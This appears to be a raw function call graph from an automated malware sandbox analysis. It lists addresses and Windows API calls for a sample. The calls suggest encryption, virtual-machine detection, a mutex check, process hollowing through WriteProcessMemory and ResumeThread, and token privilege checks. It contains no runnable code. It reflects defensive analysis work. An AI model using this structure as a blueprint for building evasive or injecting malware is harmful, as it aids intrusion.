21444 405dfe 21443->21444 21445 4017e8 CryptAcquireContextA 21444->21445 21446 405e5f 21445->21446 21447 4018a0 CryptImportKey 21446->21447 21448 405e77 21447->21448 21449 401ab0 CryptEncrypt 21448->21449 21450 405e9d 21449->21450 21451 401af8 CryptDestroyKey 21450->21451 21452 405ea5 21451->21452 21453 401b20 CryptReleaseContext 21452->21453 21456 405eaf 21453->21456 21454 4060b0 21521 4013dc GetProcessHeap RtlAllocateHeap 21454->21521 21455 406056 21457 405894 6 API calls 21455->21457 21456->21454 21456->21455 21459 40606d 21457->21459 21520 4013dc GetProcessHeap RtlAllocateHeap 21459->21520 21460 4060ae 21464 4060fa 21460->21464 21465 406107 21460->21465 21462 40607a 21463 405894 6 API calls 21462->21463 21463->21460 21522 401440 GetProcessHeap HeapFree 21464->21522 21523 401440 GetProcessHeap HeapFree 21465->21523 21468 40610f 21468->21470 21524 4013dc GetProcessHeap RtlAllocateHeap 21468->21524 21470->21419 21471 40614f 21471->21470 21472 4061c5 21471->21472 21525 401460 GetProcessHeap RtlReAllocateHeap 21471->21525 21473 4061d8 21472->21473 21474 4061cb 21472->21474 21527 4013dc GetProcessHeap RtlAllocateHeap 21473->21527 21526 401440 GetProcessHeap HeapFree 21474->21526 21478 4061e1 21479 4059bc 6 API calls 21478->21479 21480 40620f 21479->21480 21481 4017e8 CryptAcquireContextA 21480->21481 21482 406222 21481->21482 21483 401374 CryptCreateHash 21482->21483 21484 406237 21483->21484 21485 401404 CryptHashData 21484->21485 21486 40624c 21485->21486 21487 401404 CryptHashData 21486->21487 21488 406261 21487->21488 21489 401404 CryptHashData 21488->21489 21490 40627e 21489->21490 21491 401404 CryptHashData 21490->21491 21492 406292 21491->21492 21493 401490 CryptGetHashParam 21492->21493 21494 4062b2 21493->21494 21495 4014d0 CryptDestroyHash 21494->21495 21496 4062ba 21495->21496 21497 401b20 CryptReleaseContext 21496->21497 21498 4062c4 21497->21498 21499 4062db 21498->21499 21500 4062fd 21498->21500 21528 401440 GetProcessHeap HeapFree 21499->21528 21530 401440 GetProcessHeap HeapFree 21500->21530 21503 4062e3 21529 401440 GetProcessHeap HeapFree 21503->21529 21505->21428 21506->21430 21507->21432 21509 403eaf RegCreateKeyExA 21508->21509 21510 403ed5 RegCreateKeyExA 21508->21510 21511 403ef9 21509->21511 21510->21511 21518 4038b0 RegQueryValueExA 21511->21518 21513 403f16 21519 403890 RegCloseKey 21513->21519 21515 403f2f 21516 405468 GetSystemTime 21515->21516 21517 405480 21516->21517 21517->21436 21518->21513 21519->21515 21520->21462 21521->21460 21522->21470 21523->21468 21524->21471 21525->21471 21526->21470 21527->21478 21528->21503 21529->21470 21530->21470 21532 403c45 21531->21532 21535 403c4a 21531->21535 21539 403a04 21532->21539 21534 403e78 21534->21402 21535->21534 21536 403e40 WriteFile 21535->21536 21537 403e67 CloseHandle 21535->21537 21536->21535 21537->21534 21538->21408 21558 40395c RegOpenKeyA 21539->21558 21541 403a27 21559 4038b0 RegQueryValueExA 21541->21559 21543 403a43 21560 403890 RegCloseKey 21543->21560 21545 403a4e 21561 40395c RegOpenKeyA 21545->21561 21547 403a8e 21562 4038b0 RegQueryValueExA 21547->21562 21549 403aac 21563 403890 RegCloseKey 21549->21563 21551 403ab7 21564 40395c RegOpenKeyA 21551->21564 21553 403ade 21555 403b49 21553->21555 21565 4038fc RegEnumValueA 21553->21565 21566 403890 RegCloseKey 21555->21566 21557 403b63 21557->21535 21558->21541 21559->21543 21560->21545 21561->21547 21562->21549 21563->21551 21564->21553 21565->21553 21566->21557 19545 409230 19558 406eec 19545->19558 19581 406ece 19545->19581 19546 409232 19547 409254 Sleep 19546->19547 19548 409268 19546->19548 19547->19548 19611 406e04 GetModuleFileNameA CharUpperBuffA 19548->19611 19551 4092bb 19552 4092b3 19554 4069bc 10 API calls 19552->19554 19553 409285 OpenMutexA 19553->19552 19555 4092a1 CloseHandle ExitProcess 19553->19555 19554->19551 19559 403f38 2 API calls 19558->19559 19560 406f04 LoadLibraryA 19559->19560 19624 401440 GetProcessHeap HeapFree 19560->19624 19562 406f1c 19563 4070c7 19562->19563 19625 401994 19562->19625 19563->19546 19566 401994 2 API calls 19567 406f45 19566->19567 19568 401994 2 API calls 19567->19568 19569 406f57 19568->19569 19570 401994 2 API calls 19569->19570 19571 406f69 SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA 19570->19571 19631 4012dc 19571->19631 19574 403f38 2 API calls 19575 407001 19574->19575 19576 40701d SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA 19575->19576 19577 4012dc 19576->19577 19578 40708e CharLowerBuffA SetupDiDestroyDeviceInfoList 19577->19578 19579 4070b4 19578->19579 19633 401440 GetProcessHeap HeapFree 19579->19633 19582 406f21 19581->19582 19583 406ed3 19581->19583 19584 406f33 19582->19584 19585 401994 2 API calls 19582->19585 19586 406ea4 19583->19586 19588 406ed5 19583->19588 19587 401994 2 API calls 19584->19587 19585->19584 19638 401440 GetProcessHeap HeapFree 19586->19638 19589 406f45 19587->19589 19590 403f38 2 API calls 19588->19590 19592 401994 2 API calls 19589->19592 19593 406f04 LoadLibraryA 19590->19593 19595 406f57 19592->19595 19637 401440 GetProcessHeap HeapFree 19593->19637 19594 406ec7 19594->19546 19597 401994 2 API calls 19595->19597 19598 406f69 SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA 19597->19598 19601 4012dc 19598->19601 19599 406f1c 19600 4070c7 19599->19600 19602 401994 2 API calls 19599->19602 19600->19546 19603 406fdf CharLowerBuffA SetupDiDestroyDeviceInfoList 19601->19603 19602->19584 19604 403f38 2 API calls 19603->19604 19605 407001 19604->19605 19606 40701d SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA 19605->19606 19607 4012dc 19606->19607 19608 40708e CharLowerBuffA SetupDiDestroyDeviceInfoList 19607->19608 19609 4070b4 19608->19609 19639 401440 GetProcessHeap HeapFree 19609->19639 19612 403f38 2 API calls 19611->19612 19613 406e47 19612->19613 19640 401440 GetProcessHeap HeapFree 19613->19640 19615 406e6b 19616 403f38 2 API calls 19615->19616 19617 406e75 19616->19617 19641 401440 GetProcessHeap HeapFree 19617->19641 19619 406e99 19620 403f38 2 API calls 19619->19620 19621 406ea3 19620->19621 19642 401440 GetProcessHeap HeapFree 19621->19642 19623 406ec7 19623->19551 19623->19552 19623->19553 19624->19562 19626 4019e8 19625->19626 19627 4019b4 19625->19627 19626->19566 19627->19626 19628 401a62 19627->19628 19634 401928 19628->19634 19630 401a6b 19630->19626 19632 4012f0 CharLowerBuffA SetupDiDestroyDeviceInfoList 19631->19632 19632->19574 19633->19563 19635 40193c 19634->19635 19636 401961 LoadLibraryA GetProcAddress 19635->19636 19636->19630 19637->19599 19638->19594 19639->19600 19640->19615 19641->19619 19642->19623 18280 4092cd 18282 4092cf GetModuleFileNameA 18280->18282 18287 407c50 18282->18287 18290 407c77 18287->18290 18288 407ca2 ReadFile SetFilePointer ReadFile CloseHandle 18289 407cf3 wsprintfA GetCursorPos 18288->18289 18291 4069bc 18289->18291 18290->18288 18290->18289 18299 406904 GetComputerNameA 18291->18299 18293 4069d5 GetTempPathA 18294 4069fa 18293->18294 18306 4047ac 18294->18306 18297 406a2f 18300 40694f RegOpenKeyExA 18299->18300 18302 406931 18299->18302 18314 4038b0 RegQueryValueExA 18300->18314 18302->18300 18303 406992 18315 403890 RegCloseKey 18303->18315 18305 40699d 18305->18293 18307 4047df 18306->18307 18308 40480a GetFileSize 18307->18308 18309 404855 18307->18309 18308->18309 18310 40481f 18308->18310 18309->18297 18313 401828 VirtualFree 18309->18313 18316 4013b4 VirtualAlloc 18310->18316 18312 40482b ReadFile CloseHandle 18312->18309 18313->18297 18314->18303 18315->18305 18316->18312 23623 1821652 23624 18215db 23623->23624 23628 182164c 23623->23628 23625 1821609 23624->23625 23626 1820000 39 API calls 23624->23626 23629 18256f4 35 API calls 23625->23629 23630 1823124 35 API calls 23625->23630 23626->23625 23627 182164d 23629->23627 23630->23627 23821 406cfc 23822 403f38 2 API calls 23821->23822 23823 406d0c 23822->23823 23826 401440 GetProcessHeap HeapFree 23823->23826 23825 406d36 23826->23825 23848 406cf0 23849 406cfc 23848->23849 23850 403f38 2 API calls 23849->23850 23851 406d0c 23850->23851 23854 401440 GetProcessHeap HeapFree 23851->23854 23853 406d36 23854->23853 22028 408977 22031 401440 GetProcessHeap HeapFree 22028->22031 22030 40897f 22031->22030 18668 432e20 18669 4249b3 76 API calls 18668->18669 18670 432e2a 18669->18670 22463 403f36 22464 403f38 22463->22464 22467 4013dc GetProcessHeap RtlAllocateHeap 22464->22467 22466 403f6c 22467->22466 18788 409178 18790 40917a 18788->18790 18794 403b6c GetCommandLineA 18790->18794 18791 40918f 18792 4069bc 10 API calls 18791->18792 18793 40919a 18792->18793 18794->18791 19440 409347 19458 406bf0 19440->19458 19445 409391 GetWindowsDirectoryA 19447 40938c 19445->19447 19446 409368 GetWindowsDirectoryA 19446->19447 19468 405028 19447->19468 19450 409459 ExitProcess 19451 4093f9 SHGetSpecialFolderPathA 19493 40133c 19451->19493 19453 40941e PathFileExistsA 19453->19450 19454 409432 19453->19454 19455 405028 28 API calls 19454->19455 19456 409453 19455->19456 19456->19450 19495 406b60 19458->19495 19460 406bfe GetCurrentProcess 19461 40453c 19460->19461 19462 404555 GetCurrentProcess 19461->19462 19463 40454f 19461->19463 19464 40455e 19462->19464 19463->19462 19463->19464 19465 404567 IsWow64Process 19464->19465 19466 404585 19464->19466 19465->19466 19467 404579 19465->19467 19466->19445 19466->19446 19467->19466 19469 40503e GetModuleHandleA 19468->19469 19471 405049 19468->19471 19469->19471 19470 40506e CreateProcessA 19472 4052ce 19470->19472 19473 4050a3 19470->19473 19471->19470 19472->19450 19472->19451 19474 4050c4 CreateFileMappingA MapViewOfFile 19473->19474 19475 405124 19474->19475 19499 4013b4 VirtualAlloc 19475->19499 19477 405169 19500 404ef0 19477->19500 19479 4051db 19483 4051f4 GetThreadContext 19479->19483 19488 405213 19479->19488 19480 40522b 19516 404de0 19480->19516 19481 405236 19481->19472 19482 405240 VirtualProtectEx WriteProcessMemory 19481->19482 19515 401828 VirtualFree 19482->19515 19483->19488 19487 40527a ResumeThread 19489 40528a WaitForSingleObject 19487->19489 19491 4052ac 19487->19491 19488->19480 19488->19481 19490 40529c GetExitCodeProcess 19489->19490 19489->19491 19492 4052ba CloseHandle CloseHandle 19490->19492 19491->19492 19492->19472 19494 401345 19493->19494 19494->19453 19496 406b78 19495->19496 19497 406b8b Sleep 19496->19497 19497->19496 19498 406b9f 19497->19498 19498->19460 19499->19477 19522 4013dc GetProcessHeap RtlAllocateHeap 19500->19522 19502 404f0d 19523 404e94 NtQueryInformationProcess 19502->19523 19505 404f25 ReadProcessMemory 19506 405011 19505->19506 19507 404f4e ReadProcessMemory 19505->19507 19527 401440 GetProcessHeap HeapFree 19506->19527 19507->19506 19510 404f7d 19507->19510 19509 405019 19509->19479 19510->19506 19511 404fa5 ReadProcessMemory 19510->19511 19511->19506 19512 404fcc 19511->19512 19512->19506 19513 404fd8 ReadProcessMemory 19512->19513 19513->19506 19514 404ffd 19513->19514 19514->19506 19515->19487 19528 401258 19516->19528 19518 404dfb NtQueryInformationProcess 19519 404e8d 19518->19519 19520 404e18 19518->19520 19519->19481 19520->19519 19521 404e1e ReadProcessMemory ReadProcessMemory ReadProcessMemory 19520->19521 19521->19519 19522->19502 19524 404ebc 19523->19524 19525 404ee9 19523->19525 19524->19525 19526 404ec2 ReadProcessMemory 19524->19526 19525->19505 19525->19506 19526->19525 19527->19509 19528->19518 24396 406d55 24397 406d64 24396->24397 24398 403f38 2 API calls 24397->24398 24399 406d79 GetModuleHandleA 24398->24399 24402 401440 GetProcessHeap HeapFree 24399->24402 24401 406d9a 24402->24401 19985 42ca48 SetUnhandledExceptionFilter 22636 4041c8 22637 4041cc GetCurrentThread OpenThreadToken 22636->22637 22638 4041f4 GetLastError 22637->22638 22639 404217 22637->22639 22638->22639 22641 404201 GetCurrentProcess OpenProcessToken 22638->22641 22640 4042cc 22639->22640 22651 4013dc GetProcessHeap RtlAllocateHeap 22639->22651 22641->22639 22643 40422b GetTokenInformation CloseHandle 22644 40425a AllocateAndInitializeSid 22643->22644 22645 4042c4 22643->22645 22646 4042ba FreeSid 22644->22646 22649 404288 22644->22649 22652 401440 GetProcessHeap HeapFree 22645->22652 22646->22645 22648 404293 EqualSid 22648->22649 22650 4042ac 22648->22650 22649->22646 22649->22648 22650->22646 22651->22643 22652->22640 18317 432dda 18318 432de4 18317->18318 18321 4249b3 18318->18321 18324 424977 18321->18324 18323 4249c0 18325 424983 FindHandler 18324->18325 18332 4243da 18325->18332 18331 4249a4 FindHandler 18331->18323 18351 42c08b 18332->18351 18334 4243e1 18335 424890 RtlDecodePointer RtlDecodePointer 18334->18335 18336 42493f 18335->18336 18337 4248be 18335->18337 18348 4249ad 18336->18348 18337->18336 18631 4252ae 18337->18631 18339 4248d0 18340 424922 RtlEncodePointer RtlEncodePointer 18339->18340 18341 4248eb 18339->18341 18342 4248fa 18339->18342 18340->18336 18638 42a170 18341->18638 18342->18336 18344 4248f4 18342->18344 18344->18342 18345 42a170 70 API calls 18344->18345 18347 424910 RtlEncodePointer 18344->18347 18346 42490a 18345->18346 18346->18336 18346->18347 18347->18340 18664 4243e3 18348->18664 18352 42c0a0 18351->18352 18353 42c0b3 RtlEnterCriticalSection 18351->18353 18358 42bfc9 18352->18358 18353->18334 18355 42c0a6 18355->18353 18383 424664 18355->18383 18359 42bfd5 FindHandler 18358->18359 18360 42bffb 18359->18360 18390 426517 18359->18390 18368 42c00b FindHandler 18360->18368 18426 42a0df 18360->18426 18366 42c02c 18371 42c08b ___crtLCMapStringA 65 API calls 18366->18371 18367 42c01d 18432 4251b8 18367->18432 18368->18355 18373 42c033 18371->18373 18374 42c066 18373->18374 18375 42c03b InitializeCriticalSectionAndSpinCount 18373->18375 18376 422804 std::exception::_Tidy 65 API calls 18374->18376 18377 42c04b 18375->18377 18378 42c057 18375->18378 18376->18378 18435 422804 18377->18435 18441 42c082 18378->18441 18381 42c051 18382 4251b8 __cftof2_l 65 API calls 18381->18382 18382->18378 18384 426517 __amsg_exit 66 API calls 18383->18384 18385 42466e 18384->18385 18386 426368 __amsg_exit 66 API calls 18385->18386 18387 424676 18386->18387 18598 424630 18387->18598 18444 42e66a 18390->18444 18392 42651e 18393 42652b 18392->18393 18394 42e66a __amsg_exit 66 API calls 18392->18394 18395 426368 __amsg_exit 66 API calls 18393->18395 18398 42654d 18393->18398 18394->18393 18396 426543 18395->18396 18397 426368 __amsg_exit 66 API calls 18396->18397 18397->18398 18399 426368 18398->18399 18400 426389 __amsg_exit 18399->18400 18401 4264a5 18400->18401 18402 42e66a __amsg_exit 63 API calls 18400->18402 18499 429814 18401->18499 18405 4263a3 18402->18405 18404 426515 18423 4243c2 18404->18423 18406 4264b4 GetStdHandle 18405->18406 18407 42e66a __amsg_exit 63 API calls 18405->18407 18406->18401 18410 4264c2 _strlen 18406->18410 18409 4263b4 18407->18409 18408 4263c6 18408->18401 18463 42e607 18408->18463 18409->18406 18409->18408 18410->18401 18413 4264f8 WriteFile 18410->18413 18413->18401 18414 4263f2 GetModuleFileNameW 18415 426413 18414->18415 18418 42641f _wcslen 18414->18418 18416 42e607 __amsg_exit 63 API calls 18415->18416 18416->18418 18417 425114 __fltout2 10 API calls 18417->18418 18418->18417 18420 42e577 63 API calls __amsg_exit 18418->18420 18421 426495 18418->18421 18472 422b0b 18418->18472 18420->18418 18481 42e40b 18421->18481 18509 424397 GetModuleHandleW 18423->18509 18428 42a0e8 18426->18428 18429 42a11e 18428->18429 18430 42a0ff Sleep 18428->18430 18512 422a18 18428->18512 18429->18366 18429->18367 18431 42a114 18430->18431 18431->18428 18431->18429 18531 425e72 GetLastError 18432->18531 18434 4251bd 18434->18368 18436 42280f RtlFreeHeap 18435->18436 18437 422838 std::exception::_Tidy 18435->18437 18436->18437 18438 422824 18436->18438 18437->18381 18439 4251b8 __cftof2_l 64 API calls 18438->18439 18440 42282a GetLastError 18439->18440 18440->18437 18597 42bfb2 RtlLeaveCriticalSection 18441->18597 18443 42c089 18443->18368 18445 42e676 18444->18445 18446 42e680 18445->18446 18447 4251b8 __cftof2_l 66 API calls 18445->18447 18446->18392 18448 42e699 18447->18448 18451 425166 18448->18451 18454 425139 RtlDecodePointer 18451->18454 18455 42514e 18454->18455 18460 425114 18455->18460 18457 425165 18458 425139 __cftof2_l 10 API calls 18457->18458 18459 425172 18458->18459 18459->18392 18461 424feb __fltout2 8 API calls 18460->18461 18462 425126 GetCurrentProcess TerminateProcess 18461->18462 18462->18457 18464 42e61c 18463->18464 18465 42e615 18463->18465 18466 4251b8 __cftof2_l 66 API calls 18464->18466 18465->18464 18467 42e63d 18465->18467 18471 42e621 18466->18471 18469 4263e7 18467->18469 18470 4251b8 __cftof2_l 66 API calls 18467->18470 18468 425166 __cftof2_l 11 API calls 18468->18469 18469->18414 18469->18418 18470->18471 18471->18468 18476 422b1d 18472->18476 18473 422b21 18474 4251b8 __cftof2_l 66 API calls 18473->18474 18478 422b26 18473->18478 18475 422b3d 18474->18475 18477 425166 __cftof2_l 11 API calls 18475->18477 18476->18473 18476->18478 18479 422b64 18476->18479 18477->18478 18478->18418 18479->18478 18480 4251b8 __cftof2_l 66 API calls 18479->18480 18480->18475 18507 425cfe RtlEncodePointer 18481->18507 18483 42e431 18484 42e4be 18483->18484 18485 42e441 LoadLibraryW 18483->18485 18487 42e4d8 RtlDecodePointer RtlDecodePointer 18484->18487 18498 42e4eb 18484->18498 18486 42e456 GetProcAddress 18485->18486 18495 42e556 18485->18495 18488 42e46c 7 API calls 18486->18488 18486->18495 18487->18498 18488->18484 18491 42e4ae GetProcAddress RtlEncodePointer 18488->18491 18489 42e54a RtlDecodePointer 18489->18495 18490 42e521 RtlDecodePointer 18490->18489 18493 42e528 18490->18493 18491->18484 18492 429814 __87except 5 API calls 18494 42e575 18492->18494 18493->18489 18496 42e53b RtlDecodePointer 18493->18496 18494->18401 18495->18492 18496->18489 18497 42e50e 18496->18497 18497->18489 18498->18489 18498->18490 18498->18497 18500 42981e IsDebuggerPresent 18499->18500 18501 42981c 18499->18501 18508 42df25 18500->18508 18501->18404 18504 42fb08 SetUnhandledExceptionFilter UnhandledExceptionFilter 18505 42fb2d GetCurrentProcess TerminateProcess 18504->18505 18506 42fb25 __87except 18504->18506 18505->18404 18506->18505 18507->18483 18508->18504 18510 4243bb ExitProcess 18509->18510 18511 4243ab GetProcAddress 18509->18511 18511->18510 18513 422a95 18512->18513 18514 422a26 18512->18514 18515 427a95 __getbuf RtlDecodePointer 18513->18515 18517 422a31 18514->18517 18520 422a54 RtlAllocateHeap 18514->18520 18523 422a81 18514->18523 18527 422a7f 18514->18527 18529 427a95 RtlDecodePointer 18514->18529 18516 422a9b 18515->18516 18518 4251b8 __cftof2_l 65 API calls 18516->18518 18517->18514 18519 426517 __amsg_exit 65 API calls 18517->18519 18522 426368 __amsg_exit 65 API calls 18517->18522 18526 4243c2 __amsg_exit 3 API calls 18517->18526 18521 422a8d 18518->18521 18519->18517 18520->18514 18520->18521 18521->18428 18522->18517 18525 4251b8 __cftof2_l 65 API calls 18523->18525 18525->18527 18526->18517 18528 4251b8 __cftof2_l 65 API calls 18527->18528 18528->18521 18530 427aaa 18529->18530 18530->18514 18545 425d30 TlsGetValue 18531->18545 18533 425edf SetLastError 18533->18434 18537 425ea5 RtlDecodePointer 18538 425eba 18537->18538 18539 425ebe 18538->18539 18540 425ed6 18538->18540 18554 425dbe 18539->18554 18541 422804 std::exception::_Tidy 62 API calls 18540->18541 18543 425edc 18541->18543 18543->18533 18544 425ec6 GetCurrentThreadId 18544->18533 18546 425d45 RtlDecodePointer TlsSetValue 18545->18546 18547 425d60 18545->18547 18546->18547 18547->18533 18548 42a124 18547->18548 18550 42a12d 18548->18550 18551 425e9d 18550->18551 18552 42a14b Sleep 18550->18552 18567 42afac 18550->18567 18551->18533 18551->18537 18553 42a160 18552->18553 18553->18550 18553->18551 18576 429ef0 18554->18576 18556 425dca GetModuleHandleW 18557 42c08b ___crtLCMapStringA 64 API calls 18556->18557 18558 425e08 InterlockedIncrement 18557->18558 18577 425e60 18558->18577 18561 42c08b ___crtLCMapStringA 64 API calls 18562 425e29 18561->18562 18580 4259c5 InterlockedIncrement 18562->18580 18564 425e47 18592 425e69 18564->18592 18566 425e54 FindHandler 18566->18544 18568 42afb8 18567->18568 18571 42afd3 18567->18571 18569 42afc4 18568->18569 18568->18571 18572 4251b8 __cftof2_l 65 API calls 18569->18572 18570 42afe6 RtlAllocateHeap 18570->18571 18575 42b00d 18570->18575 18571->18570 18574 427a95 __getbuf RtlDecodePointer 18571->18574 18571->18575 18573 42afc9 18572->18573 18573->18550 18574->18571 18575->18550 18576->18556 18595 42bfb2 RtlLeaveCriticalSection 18577->18595 18579 425e22 18579->18561 18581 4259e6 18580->18581 18582 4259e3 InterlockedIncrement 18580->18582 18583 4259f3 18581->18583 18584 4259f0 InterlockedIncrement 18581->18584 18582->18581 18585 4259fd InterlockedIncrement 18583->18585 18586 425a00 18583->18586 18584->18583 18585->18586 18587 425a0a InterlockedIncrement 18586->18587 18588 425a0d 18586->18588 18587->18588 18589 425a26 InterlockedIncrement 18588->18589 18590 425a41 InterlockedIncrement 18588->18590 18591 425a36 InterlockedIncrement 18588->18591 18589->18588 18590->18564 18591->18588 18596 42bfb2 RtlLeaveCriticalSection 18592->18596 18594 425e70 18594->18566 18595->18579 18596->18594 18597->18443 18601 4244da 18598->18601 18600 424641 18602 4244e6 FindHandler 18601->18602 18603 42c08b ___crtLCMapStringA 61 API calls 18602->18603 18604 4244ed 18603->18604 18606 424518 RtlDecodePointer 18604->18606 18611 424597 18604->18611 18608 42452f RtlDecodePointer 18606->18608 18606->18611 18620 424542 18608->18620 18609 424614 FindHandler 18609->18600 18624 424605 18611->18624 18612 4245fc 18614 4243c2 __amsg_exit 3 API calls 18612->18614 18615 424605 18614->18615 18616 424612 18615->18616 18629 42bfb2 RtlLeaveCriticalSection 18615->18629 18616->18600 18617 424559 RtlDecodePointer 18623 425cfe RtlEncodePointer 18617->18623 18620->18611 18620->18617 18621 424568 RtlDecodePointer RtlDecodePointer 18620->18621 18622 425cfe RtlEncodePointer 18620->18622 18621->18620 18622->18620 18623->18620 18625 4245e5 18624->18625 18626 42460b 18624->18626 18625->18609 18628 42bfb2 RtlLeaveCriticalSection 18625->18628 18630 42bfb2 RtlLeaveCriticalSection 18626->18630 18628->18612 18629->18616 18630->18625 18632 4252b9 18631->18632 18633 4252ce RtlSizeHeap 18631->18633 18634 4251b8 __cftof2_l 66 API calls 18632->18634 18633->18339 18635 4252be 18634->18635 18636 425166 __cftof2_l 11 API calls 18635->18636 18637 4252c9 18636->18637 18637->18339 18640 42a179 18638->18640 18641 42a1b8 18640->18641 18642 42a199 Sleep 18640->18642 18643 425201 18640->18643 18641->18344 18642->18640 18644 42520c 18643->18644 18645 425217 18643->18645 18648 422a18 __getbuf 66 API calls 18644->18648 18646 42521f 18645->18646 18647 42522c 18645->18647 18649 422804 std::exception::_Tidy 66 API calls 18646->18649 18651 425264 18647->18651 18653 425234 RtlReAllocateHeap 18647->18653 18656 425294 18647->18656 18657 427a95 __getbuf RtlDecodePointer 18647->18657 18660 42527c 18647->18660 18650 425214 18648->18650 18661 425227 std::exception::_Tidy 18649->18661 18650->18640 18652 427a95 __getbuf RtlDecodePointer 18651->18652 18654 42526a 18652->18654 18653->18647 18653->18661 18655 4251b8 __cftof2_l 66 API calls 18654->18655 18655->18661 18658 4251b8 __cftof2_l 66 API calls 18656->18658 18657->18647 18659 425299 GetLastError 18658->18659 18659->18661 18662 4251b8 __cftof2_l 66 API calls 18660->18662 18661->18640 18663 425281 GetLastError 18662->18663 18663->18661 18667 42bfb2 RtlLeaveCriticalSection 18664->18667 18666 4243ea 18666->18331 18667->18666 24433 406d64 24434 403f38 2 API calls 24433->24434 24435 406d79 GetModuleHandleA 24434->24435 24438 401440 GetProcessHeap HeapFree 24435->24438 24437 406d9a 24438->24437 18807 424946 18808 42a124 __getptd 66 API calls 18807->18808 18809 424952 RtlEncodePointer 18808->18809 18810 42496b 18809->18810 19981 409147 19982 409149 19981->19982 19983 4069bc 10 API calls 19982->19983 19984 409166 19983->19984 22696 403e98 22697 403eaf RegCreateKeyExA 22696->22697 22698 403ed5 RegCreateKeyExA 22696->22698 22699 403ef9 22697->22699 22698->22699 22704 4038b0 RegQueryValueExA 22699->22704 22701 403f16 22705 403890 RegCloseKey 22701->22705 22703 403f2f 22704->22701 22705->22703 18795 424d6e 18799 42d0c2 18795->18799 18797 424d73 18798 42d0c2 5 API calls 18797->18798 18798->18797 18800 42d0f4 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount RtlQueryPerformanceCounter 18799->18800 18801 42d0e7 18799->18801 18802 42d0eb 18800->18802 18801->18800 18801->18802 18802->18797 19986 432da2 19987 432dba 19986->19987 19988 4249b3 76 API calls 19987->19988 19989 432dd8 19988->19989 19990 18215a4 19998 18214a0 19990->19998 20040 18204e0 19998->20040 20054 18202f0 20040->20054 20056 18202f5 20054->20056 19412 41d5c9 19413 41d5d0 DragQueryFile 19412->19413 19422 41d590 19413->19422 19414 41d70f EnableMenuItem 19416 41d971 __cftof2_l 19414->19416 19437 41d75f GetDlgItem OleInitialize 19414->19437 19415 41d694 CreateRectRgnIndirect 19415->19414 19415->19422 19417 41d987 SetMenuItemInfoA 19416->19417 19419 41d9bc GetLastError 19417->19419 19420 41d9c4 DrawMenuBar 19417->19420 19418 41d6e3 WaitForSingleObject 19418->19422 19423 41d9cb __cftof2_l 19419->19423 19420->19423 19421 41d5b0 GetCursorPos 19421->19413 19422->19413 19422->19414 19422->19415 19422->19418 19422->19421 19424 41d9da GetMenuItemInfoA BeginPaint EndPaint GetClientRect EnumDateFormatsA 19423->19424 19429 41da5b 19424->19429 19425 41da80 lstrcmpi 19426 41da8c lstrcmpi 19425->19426 19433 41dac9 19425->19433 19427 41da98 lstrcmpi 19426->19427 19426->19433 19428 41daa4 lstrcmpi 19427->19428 19430 41dac7 19427->19430 19428->19429 19428->19430 19429->19425 19429->19430 19431 4198e0 81 API calls 19430->19431 19432 41db3e Sleep 19430->19432 19431->19432 19432->19433 19436 41d93c RegisterDragDrop GetTopWindow RevokeDragDrop 19438 41d95a OleUninitialize 19436->19438 19437->19436 19438->19416 18671 4091fa 18679 4070e5 18671->18679 18697 407118 18671->18697 18672 4091fc 18714 404a68 GetComputerNameA 18672->18714 18674 409216 18675 4069bc 10 API calls 18674->18675 18676 40921e 18675->18676 18680 407118 18679->18680 18732 403f38 18680->18732 18684 407155 18685 403f38 2 API calls 18684->18685 18686 407166 18685->18686 18736 4038b0 RegQueryValueExA 18686->18736 18688 4071bb 18738 401440 GetProcessHeap HeapFree 18688->18738 18689 407185 18689->18688 18690 403f38 2 API calls 18689->18690 18692 407196 18690->18692 18737 401440 GetProcessHeap HeapFree 18692->18737 18693 4071c3 18739 403890 RegCloseKey 18693->18739 18695 4071cb 18695->18672 18698 403f38 2 API calls 18697->18698 18699 407130 RegOpenKeyExA 18698->18699 18741 401440 GetProcessHeap HeapFree 18699->18741 18701 407155 18702 403f38 2 API calls 18701->18702 18703 407166 18702->18703 18742 4038b0 RegQueryValueExA 18703->18742 18705 4071bb 18744 401440 GetProcessHeap HeapFree 18705->18744 18706 407185 18706->18705 18707 403f38 2 API calls 18706->18707 18710 407196 18707->18710 18709 4071c3 18745 403890 RegCloseKey 18709->18745 18743 401440 GetProcessHeap HeapFree 18710->18743 18712 4071cb 18712->18672 18715 404aa3 RegOpenKeyExA 18714->18715 18718 404a95 18714->18718 18746 4038b0 RegQueryValueExA 18715->18746 18717 404ae6 18747 403890 RegCloseKey 18717->18747 18718->18715 18720 404af1 18748 4044f0 18720->18748 18722 404b12 GetCurrentProcess 18751 4042d4 OpenProcessToken 18722->18751 18725 4044f0 GetVersionExA 18726 404b2c 18725->18726 18727 404b41 GetCurrentProcess 18726->18727 18728 404b31 18726->18728 18730 4042d4 11 API calls 18727->18730 18765 4041cc GetCurrentThread OpenThreadToken 18728->18765 18731 404b36 18730->18731 18731->18674 18740 4013dc GetProcessHeap RtlAllocateHeap 18732->18740 18734 403f6c RegOpenKeyExA 18735 401440 GetProcessHeap HeapFree 18734->18735 18735->18684 18736->18689 18737->18688 18738->18693 18739->18695 18740->18734 18741->18701 18742->18706 18743->18705 18744->18709 18745->18712 18746->18717 18747->18720 18779 401258 18748->18779 18750 404509 GetVersionExA 18750->18722 18752 4043f9 18751->18752 18753 404300 GetTokenInformation 18751->18753 18752->18725 18754 404322 GetLastError 18753->18754 18755 4043ef CloseHandle 18753->18755 18754->18755 18756 404331 18754->18756 18755->18752 18780 4013dc GetProcessHeap RtlAllocateHeap 18756->18780 18758 404339 18758->18755 18759 404346 GetTokenInformation 18758->18759 18760 404368 GetSidSubAuthorityCount 18759->18760 18761 4043a2 18759->18761 18760->18761 18763 40437d 18760->18763 18781 401440 GetProcessHeap HeapFree 18761->18781 18763->18761 18764 404385 GetSidSubAuthority 18763->18764 18764->18761 18766 4041f4 GetLastError 18765->18766 18768 404217 18765->18768 18766->18768 18769 404201 GetCurrentProcess OpenProcessToken 18766->18769 18767 4042cc 18767->18731 18768->18767 18782 4013dc GetProcessHeap RtlAllocateHeap 18768->18782 18769->18768 18771 40422b GetTokenInformation CloseHandle 18772 40425a AllocateAndInitializeSid 18771->18772 18773 4042c4 